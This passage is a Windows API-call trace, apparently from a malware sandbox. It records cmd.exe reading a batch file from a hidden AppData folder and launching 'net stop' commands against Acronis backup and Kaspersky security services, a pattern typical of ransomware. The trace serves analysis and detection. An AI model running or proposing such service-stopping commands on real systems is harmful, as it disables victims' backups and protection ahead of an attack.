lpValue="00000002") returned 1 [0200.677] GetProcessHeap () returned 0x3e0000 [0200.677] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.677] GetEnvironmentStringsW () returned 0x3f8408* [0200.677] GetProcessHeap () returned 0x3e0000 [0200.677] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.678] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.678] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0200.678] GetProcessHeap () returned 0x3e0000 [0200.678] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.678] GetEnvironmentStringsW () returned 0x3f8408* [0200.678] GetProcessHeap () returned 0x3e0000 [0200.678] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.678] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.678] GetProcessHeap () returned 0x3e0000 [0200.678] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0200.678] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0200.678] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.678] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0200.678] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.678] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0200.678] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.678] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0200.679] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.679] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0200.679] SetConsoleInputExeNameW () returned 0x1 [0200.679] GetConsoleOutputCP () returned 0x1b5 [0200.679] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0200.679] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.679] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0200.680] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0200.680] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.680] SetFilePointer (in: hFile=0x74, lDistanceToMove=3135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc3f [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0200.680] GetProcessHeap () returned 0x3e0000 [0200.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0200.680] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.680] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc3f [0200.680] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xc82, lpOverlapped=0x0) returned 1 [0200.680] SetFilePointer (in: hFile=0x74, lDistanceToMove=3161, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc59 [0200.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop AcronisAgent /y\r\nEM_BGC /y\r\n ServiceΓÇ¥ /y\r\nures\r\nnded\r\n") returned 26 [0200.681] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.681] GetFileType (hFile=0x74) returned 0x1 [0200.681] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.681] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc59 [0200.681] GetProcessHeap () returned 0x3e0000 [0200.681] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0200.681] GetProcessHeap () returned 0x3e0000 [0200.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0200.684] _tell (_FileHandle=3) returned 3161 [0200.684] _close (_FileHandle=3) returned 0 [0200.684] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0200.684] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0200.684] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0200.684] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0200.684] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0200.685] _wcsicmp (_String1="net", _String2="CD") returned 11 [0200.685] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0200.685] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0200.685] _wcsicmp (_String1="net", _String2="REN") returned -4 [0200.685] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0200.685] _wcsicmp (_String1="net", _String2="SET") returned -5 [0200.685] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0200.685] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0200.685] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0200.685] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0200.685] _wcsicmp (_String1="net", _String2="MD") returned 1 [0200.685] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0200.685] _wcsicmp (_String1="net", _String2="RD") returned -4 [0200.685] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0200.685] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0200.685] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0200.685] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0200.685] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0200.685] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0200.685] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0200.685] _wcsicmp (_String1="net", _String2="VER") returned -8 [0200.685] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0200.685] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0200.685] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0200.685] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0200.685] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0200.685] _wcsicmp (_String1="net", _String2="START") returned -5 [0200.685] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0200.685] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0200.685] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0200.685] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0200.685] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0200.685] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0200.685] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0200.685] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0200.685] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0200.685] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0200.686] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0200.686] SetErrorMode (uMode=0x0) returned 0x1 [0200.686] GetProcessHeap () returned 0x3e0000 [0200.686] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0200.686] GetProcessHeap () returned 0x3e0000 [0200.686] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0200.686] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.686] GetProcessHeap () returned 0x3e0000 [0200.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0200.686] GetProcessHeap () returned 0x3e0000 [0200.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0200.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.687] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.687] GetLastError () returned 0x2 [0200.688] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.688] GetLastError () returned 0x2 [0200.688] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.689] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.689] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.689] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.689] GetLastError () returned 0x2 [0200.689] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.690] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.690] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.690] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0200.690] SetErrorMode (uMode=0x0) returned 0x1 [0200.691] GetProcessHeap () returned 0x3e0000 [0200.691] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0200.691] GetProcessHeap () returned 0x3e0000 [0200.691] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0200.691] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.691] GetProcessHeap () returned 0x3e0000 [0200.691] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0200.691] GetProcessHeap () returned 0x3e0000 [0200.691] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0200.691] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.692] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.692] GetLastError () returned 0x2 [0200.692] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.692] GetLastError () returned 0x2 [0200.693] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.693] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0200.693] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0200.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.694] GetLastError () returned 0x2 [0200.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0200.694] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0200.694] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.695] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0200.695] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0200.695] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0200.695] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0200.695] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop AcronisAgent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop AcronisAgent /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop AcronisAgent /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x1ec, dwThreadId=0x63c)) returned 1 [0200.699] CloseHandle (hObject=0x74) returned 1 [0200.699] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0200.699] GetProcessHeap () returned 0x3e0000 [0200.699] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.699] GetEnvironmentStringsW () returned 0x3f8408* [0200.699] GetProcessHeap () returned 0x3e0000 [0200.699] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.700] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.700] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0200.836] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0200.837] CloseHandle (hObject=0x78) returned 1 [0200.837] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0200.837] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0200.837] GetProcessHeap () returned 0x3e0000 [0200.837] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.837] GetEnvironmentStringsW () returned 0x3f8408* [0200.837] GetProcessHeap () returned 0x3e0000 [0200.837] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.837] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.837] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0200.837] GetProcessHeap () returned 0x3e0000 [0200.837] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.837] GetEnvironmentStringsW () returned 0x3f8408* [0200.837] GetProcessHeap () returned 0x3e0000 [0200.838] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.838] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.838] GetProcessHeap () returned 0x3e0000 [0200.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0200.838] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0200.838] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.838] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0200.838] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.838] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0200.838] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.838] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0200.838] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.838] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0200.839] SetConsoleInputExeNameW () returned 0x1 [0200.839] GetConsoleOutputCP () returned 0x1b5 [0200.839] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0200.839] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0200.839] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0200.839] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.839] SetFilePointer (in: hFile=0x78, lDistanceToMove=3161, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc59 [0200.839] GetProcessHeap () returned 0x3e0000 [0200.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0200.839] GetProcessHeap () returned 0x3e0000 [0200.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0200.839] GetProcessHeap () returned 0x3e0000 [0200.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0200.839] GetProcessHeap () returned 0x3e0000 [0200.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0200.840] GetProcessHeap () returned 0x3e0000 [0200.840] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0200.840] GetProcessHeap () returned 0x3e0000 [0200.840] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0200.840] GetProcessHeap () returned 0x3e0000 [0200.840] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0200.840] GetProcessHeap () returned 0x3e0000 [0200.840] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0200.840] GetProcessHeap () returned 0x3e0000 [0200.840] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0200.840] GetProcessHeap () returned 0x3e0000 [0200.840] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0200.840] GetProcessHeap () returned 0x3e0000 [0200.840] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0200.840] GetProcessHeap () returned 0x3e0000 [0200.840] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0200.840] GetProcessHeap () returned 0x3e0000 [0200.840] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0200.840] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.840] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc59 [0200.840] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xc68, lpOverlapped=0x0) returned 1 [0200.840] SetFilePointer (in: hFile=0x78, lDistanceToMove=3182, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc6e [0200.840] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop KAVFSGT /y\r\n /y\r\nEM_BGC /y\r\n ServiceΓÇ¥ /y\r\nures\r\nnded\r\n") returned 21 [0200.841] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.841] GetFileType (hFile=0x78) returned 0x1 [0200.841] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.841] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc6e [0200.841] GetProcessHeap () returned 0x3e0000 [0200.841] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0200.841] GetProcessHeap () returned 0x3e0000 [0200.841] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0200.844] _tell (_FileHandle=3) returned 3182 [0200.844] _close (_FileHandle=3) returned 0 [0200.844] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0200.844] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0200.844] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0200.844] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0200.844] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0200.844] _wcsicmp (_String1="net", _String2="CD") returned 11 [0200.844] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0200.844] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0200.844] _wcsicmp (_String1="net", _String2="REN") returned -4 [0200.844] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0200.844] _wcsicmp (_String1="net", _String2="SET") returned -5 [0200.844] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0200.844] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0200.844] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0200.844] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0200.845] _wcsicmp (_String1="net", _String2="MD") returned 1 [0200.845] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0200.845] _wcsicmp (_String1="net", _String2="RD") returned -4 [0200.845] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0200.845] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0200.845] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0200.845] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0200.845] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0200.845] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0200.845] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0200.845] _wcsicmp (_String1="net", _String2="VER") returned -8 [0200.845] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0200.845] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0200.845] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0200.845] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0200.845] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0200.845] _wcsicmp (_String1="net", _String2="START") returned -5 [0200.845] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0200.845] _wcsicmp (_String1="net", _String2="KEYS") returned 